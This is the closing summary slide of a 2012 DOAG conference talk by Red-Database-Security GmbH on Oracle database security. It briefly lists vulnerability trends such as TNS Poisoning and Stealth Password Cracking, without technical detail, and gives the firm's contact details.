* http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
65
November 2012
• DOAG 2012
Summary
! Annus Horibilis for Oracle (Java, MySQL, Oracle)
! Easy SQL Injection bugs in PL/SQL are nearly gone. Researcher are looking for more complicated bugs.
! Critical bugs are not fixed only workaround are available
! Nearly all databases (TNS Poisoning) or 11g databases (Stealth Password Cracking) are affected.
Thank you! Contact:
Red-Database-Security GmbH
Bliesstr. 16
D-.66538 Neunkirchen
Germany